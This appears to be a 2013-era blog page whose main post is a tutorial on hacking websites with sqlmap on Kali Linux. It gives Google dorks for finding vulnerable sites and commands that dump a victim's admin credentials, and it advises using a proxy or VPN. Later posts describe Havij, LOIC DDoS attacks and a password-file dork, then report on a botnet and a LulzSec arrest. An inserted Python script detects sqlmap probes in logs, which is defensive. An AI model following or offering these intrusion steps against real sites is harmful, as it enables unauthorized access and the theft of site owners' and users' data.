
Sunday, 12 January 2014

Hack Website Using SqlMap | Kali Linux

In this tutorial I am going to show you how to hack a website with sqlmap on Kali Linux.

Introduction
Sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches ranging from database fingerprinting, through data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections. That is what sqlmap is about.
Now follow my steps to hack a website using sqlmap.

Step 1
Find an SQL-vulnerable site.
I will give you some dorks which may help you find websites vulnerable to SQL injection.

Code:
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=

Step 2
Test if the website is vulnerable
To test whether the website is vulnerable to SQLi, just add " " at the end of the URL, as in the image below:

[Image: image1_zps1ba326d9.jpg]

And press Enter. If an error appears like the one in the image below, it means the website is vulnerable.

[Image: image2_zpsffcf021f.jpg]


(I'm not going to explain advanced ways to check the website for SQL vulnerabilities because there are plenty of tutorials about that on CHF)


OK, so we found the target. Now let's go ahead.

Step 3
Injection
Type this command in the terminal and hit Enter, as in the image below:

Code:
sqlmap -u "www.yourtaget.com/page.php?id=1" --dbs
(Insert the URL that we checked for SQL vulnerability)
[Image: image3_zps85f6aa32.jpg]


Now we will get the database name of the website.

[Image: image4_zps29fa4d64.jpg]


We got two databases, ohridhot_ohrid and information_schema. We will select the ohridhot_ohrid database.

Let's get the tables of that database.
For that we need to enter this command on terminal and after that hit Enter. 

Code:
sqlmap -u "http://www.yourvictim/page.php?id=1" -D ohridhot_ohrid --tables

[Image: image5_zpsf83a99b1.jpg]


Now we will get the tables list which is stored in the database we selected.

[Image: image6_zps002b2bf8.jpg]


Now let's grab the columns from the admin table. Type in the terminal:

Code:
sqlmap -u "http://www.yourvictim/page.php?id=1" -D ohridhot_ohrid -T admin --columns

Now we have the columns, including user and pass, as in the image below:

[Image: image7_zpsfb061ca9.jpg]


Now let's grab the user and pass

Code:
sqlmap -u "http://www.yourvictim/page.php?id=1" -D ohridhot_ohrid -T admin -C user,pass --dump

[Image: image8_zpsc0a432ae.jpg]
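What the Step 3 commands look like from the server side, as an added detection example that is not part of the original tutorial. The log lines, client addresses, rule names and the `analyze` function are constructed for illustration; the only sqlmap-specific fact used is that its default User-Agent contains `sqlmap/`.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# Constructed combined-format access log; client addresses are documentation ranges.
SAMPLE_LOG = """\
198.51.100.7 - - [12/Jan/2014:10:00:01 +0000] "GET /page.php?id=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [12/Jan/2014:10:00:02 +0000] "GET /page.php?id=1%27 HTTP/1.1" 500 310 "-" "Mozilla/5.0"
203.0.113.9 - - [12/Jan/2014:10:00:05 +0000] "GET /page.php?id=1%20AND%204512%3D4512 HTTP/1.1" 200 5120 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
203.0.113.9 - - [12/Jan/2014:10:00:06 +0000] "GET /page.php?id=1%20UNION%20ALL%20SELECT%20NULL%20FROM%20information_schema.tables HTTP/1.1" 200 4800 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
"""

LINE_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"$'
)

# Rules run on the URL-decoded parameter value, so %27 and %20 cannot hide a payload.
PAYLOAD_RULES = [
    ("quote-in-parameter", re.compile(r"['\"]")),  # weak alone, strong on numeric ids
    ("boolean-test", re.compile(r"\b(?:and|or)\s+\d+\s*=\s*\d+", re.I)),
    ("union-select", re.compile(r"\bunion\b.*\bselect\b", re.I)),
    ("schema-enumeration", re.compile(r"\binformation_schema\b", re.I)),
]

def analyze(log_text):
    """Return {client_ip: sorted list of matched rule names} for suspicious clients."""
    findings = defaultdict(set)
    for line in log_text.splitlines():
        match = LINE_RE.match(line)
        if not match:
            continue
        ip, target, status, agent = match.groups()
        reasons = set()
        # sqlmap announces itself by default; the header is client-controlled,
        # so the payload rules below must not depend on it.
        if "sqlmap/" in agent.lower():
            reasons.add("sqlmap-user-agent")
        for _name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            reasons.update(name for name, rx in PAYLOAD_RULES if rx.search(value))
        # A 5xx answer to a flagged request suggests raw SQL errors reach the client.
        if reasons and status.startswith("5"):
            reasons.add("server-error-on-probe")
        if reasons:
            findings[ip] |= reasons
    return {ip: sorted(names) for ip, names in findings.items()}

if __name__ == "__main__":
    for ip, names in analyze(SAMPLE_LOG).items():
        print(ip, ", ".join(names))
```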

Now we have to decrypt the hash; there are also tutorials about hash decryption on CHF.
The only thing left now is to find the admin page, and remember to use a proxy/VPN!

Directory of sqlmap on Kali Linux
Places -> Computer -> Filesystem -> usr -> share -> sqlmap -> output


That's all, I hope you enjoyed the tutorial.

Credit : CrackHackForum

Thursday, 19 December 2013

Nowadays it’s easy to hack a website in just four steps

Hackers (extremexploit.com)

Until recent years, hacking a website required tech geeks with above-average knowledge, but these days it has become child's play. As with conventional searches, you can Google the tools required to plan a hack attack on a website, and with a little effort you can execute it with ease. Here, in four easy steps, is how hackers do it.

Step 1: Identifying

The hacktivists first identify the target website they want to attack. They qualify the website according to the vulnerability level they wish to attack. Checking the vulnerability of the website allows the hacker to prepare the tools and techniques required to bring down the website.

Hackers generally use Google Dorks, or Google hacking, to run a vulnerability check against these easy-to-hack websites. Very recently a hacker posted a list of 5,000 such websites that were really easy to attack. If they don't wish to Google it, they can Bing it. This tool is heaven for hackers, as it helps in qualifying such websites.

Hackers have a ready-to-refer index of dorks that point out websites having a particular vulnerability. From passwords to login credentials, there is a dork available for everything. They would Google intitle:"Index of" master.passwd, which returns a file containing the passwords, and then they have a list of potential victims ready for the hack.

Step 2: Spotting the vulnerabilities

Acunetix, a Windows-based application for testing websites developed by a UK-based company, was designed for and is still prominently used by developers to test for vulnerabilities in a website, but hackers' technical expertise with this tool allows them to point out the website's weaknesses. Once a site is identified for attack, hackers use this tool to check its vulnerability, as not all websites qualified in level 1 may be susceptible to attack.

Since the hackers have in-depth knowledge of the above-mentioned software, they can not only crack the trial version, but the cracked version is also freely available in the hacker community. Once they enter the URL or website address in this software, they are able to point out the loopholes in the website, and they then move on to step 3.

Step 3: The Attack on the website – SQL Injection

SQL injection is the easiest and most used way for hackers to hack into a website. Hackers use it to break into user accounts and steal information stored in the site's databases. The attack aims at stealing information using a few lines of code in SQL (Structured Query Language), which is a database programming language. The hackers don't even have to learn the language for this attack, as there is software called “Havij” available free of cost in the hacker forums. It comes as an easily usable application. Havij was originally developed in Iran. The word itself means carrot, a bad-slang for the word penis, ultimately meaning that the hack-ware helps in penetrating a website.

Havij has two versions, paid and unpaid, which differ in their powers of penetration, although the paid version can be cracked and downloaded from other hacker forums. The interface of this software is completely simple, like any other Windows application: it does its work when a newbie hacker just copies the link of the website to be hacked and pastes it into the application.

The tasks Havij can perform are very surprising. The best one for hackers, and the worst for the users of the website, is called “Get”. It fetches all the data stored in the target website's databases, ranging from usernames and passwords to phone numbers and bank details.

It is so easy for hackers that within a couple of minutes they can search for, download and use one or two automated hack-wares that allow them to access websites vulnerable to such attacks. Rest assured that the websites of high-profile companies like Google, Microsoft and Facebook are completely safe from such tools. As mentioned before, the vulnerability of the web is displayed by the attack on Sony's PlayStation Network, which led to the leaking of its customers' personal information in a very similar way.

Step 4: The DDoS – The A Game

SQL injection has been used by the infamous hacktivist community Anonymous for over a year now, but they tend to move on to DDoS when simple tools like Havij don't work. As with the SQL (pronounced "sequel") injection attack, there are freely available tools for DDoS as well.

As it appears, DDoS is as simple as the SQL injection attack. The program used here is called the Low Orbit Ion Cannon (LOIC), which was created by web developers for stress testing their own websites but was later hijacked by hackers to attack websites for non-social use.

LOIC is freely available to hackers on the website Source Forge. As with Havij, the hackers just have to type in the link of the website they want to DDoS and the application does the rest. LOIC overloads the server of the target website with up to 200 requests per second.

Again, while the bigger websites can easily cope with this type of attack without crashing, most other websites cannot. Surely if a group of hackers, however new, dedicates itself to the job, it is very easy for them to complete it.

This type of technology horrifies readers, but it is so simple for hackers to use that they can even control it from their phones, meaning that they could well be watching a movie with their buddies in the cinema while attacking the website they want to bring down.

This is not an exhaustive list of the processes hackers use to execute the act, and there are many tutorials on various hacking forums that teach how to perform the attack. There is no end to this notoriety, in many cases a heinous crime, which has caused losses of millions and millions of dollars to the world. So are you going to get your website checked by your developer today? Maybe today would be a really good day to get it done.

Wednesday, 18 December 2013

“Advanced Power” Botnet enrolls Firefox users to hack the sites they visit



A highly unusual botnet has been found that has ensnared more than 12,000 computer systems while disguising itself as an authentic add-on for the popular Mozilla Firefox browser. The botnet forces the computers it infects to analyze websites for security flaws.

This highly dangerous botnet, called “Advanced Power” by its developers, seems to have been in existence since May 2013 or even earlier. Nobody has been able to explain how the malware is being spread to infect so many computers. It enslaves its victim PCs in a botnet and carries out SQL injection attacks on any website that the victim visits.

The more serious capability of this botnet is extracting passwords and other personal and sensitive information from the machines it has infected, but you may breathe a quiet sigh of relief, as this feature doesn't appear to be active on the infected hosts. Instead, the botnet is functioning only to use the enslaved Windows desktops as a wide scanning platform for finding websites that can be exploited easily.

According to the administrative panel of Advanced Power, at least 12,500 PCs are infected and have helped find around 18,000 web pages that are exploitable by SQL injection attacks.
The code being injected in the websites is from sources from the following two links:
  1. Malwr Writeup
  2. Virustotal Entry
We wouldn’t really recommend you going out looking for this malware!
On infected PCs running the Mozilla Firefox browser, the bot code installs itself as a browser plug-in calling itself “Microsoft .NET Framework Assistant”, which is bogus and completely different from the original plug-in. After installing itself in Firefox, the bot code checks every page the user visits in the browser and tests it for SQL injection exploitability.

Alex Holden, chief information security officer of Hold Security LLC, commented that the botnet program seems to have been developed to automate the tedious blind guesswork involved in probing websites for SQL injection vulnerabilities. Holden added that when an application is tested for SQL injection or any other vulnerability, there is only a small frame of reference as to the site's functionality. He said, “You often don’t know or can’t see many user functions. And in some cases you need proper credentials to do it right. In this case, the hackers are using valid requests within many sites that end-users themselves are feeding them. This is a much bigger sample than you would normally get. By no means is it a full regression test, but it is a deep and innovative approach.”
Holden believes that the developers of Advanced Power are from the Czech Republic, as he noted that a few transliterated strings of text in the malware are auto-detected as Czech by Google Translate.

Advanced Power is a solid example of how today's infected systems are regularly used to attack the defenses guarding the privacy and information of other users online. What makes the story more interesting is that there is a Firefox add-on that runs the same tests on the websites a user visits, but for security testing purposes. Readers looking for a free tool to test their sites' strength against such attacks should try sqlmap, an open source penetration testing tool for attacks like SQL injection.

Mozilla has recently commented on this: “We have disabled the fraudulent Microsoft .NET Framework Assistant add-on used by Advanced Power botnet,” by adding the fraudulent add-on to its blocked list. According to Mozilla, Firefox displays a message once every day as it checks for blocked add-ons while the browser is in use, and the blocking doesn't require the user to take any action to take effect.

Tuesday, 11 September 2012

LulzSec hacker arrested over Sony attack

A second member of the LulzSec hacking group was arrested by US authorities in connection with attacks on Sony Pictures Europe.
US police arrested Raynaldo Rivera, 20, a member of the hacking group LulzSec, on charges that he took part in a breach of the computer systems belonging to Sony Pictures Europe.

The indictment, which was unsealed on Tuesday, accuses Rivera and co-conspirators of stealing information from Sony Pictures Europe's computer systems in May and June 2011 using an SQL injection attack – which exploits flaws in the handling of data input for databases to take control of a system – against the studio's website. SQL injection, or SQLi, is an increasingly common technique used by hackers to break into systems.

The attack, which may have leaked credit card details for millions of users, has never been traced to any group – although Sony suggested not long afterwards that Anonymous might have been involved. Since then it has given no further details about who it suspects of carrying out the attack, and no data from the attack has ever been posted publicly.

"From a single injection we accessed EVERYTHING," the hackers said in a statement at the time. "Why do you put such faith in a company that allows itself to become open to these simple attacks?"

Authorities have said the Sony breach ultimately cost the company more than $600,000 (£378,000).
An accused British hacker, Ryan Cleary, 20, was indicted by a US grand jury in June on charges related to LulzSec attacks on several media companies, including Sony Pictures.

The rise of LulzSec saw a burst of similar "crews" aiming to hack sites, but since then Anonymous has focussed on providing an outlet for documents released by WikiLeaks.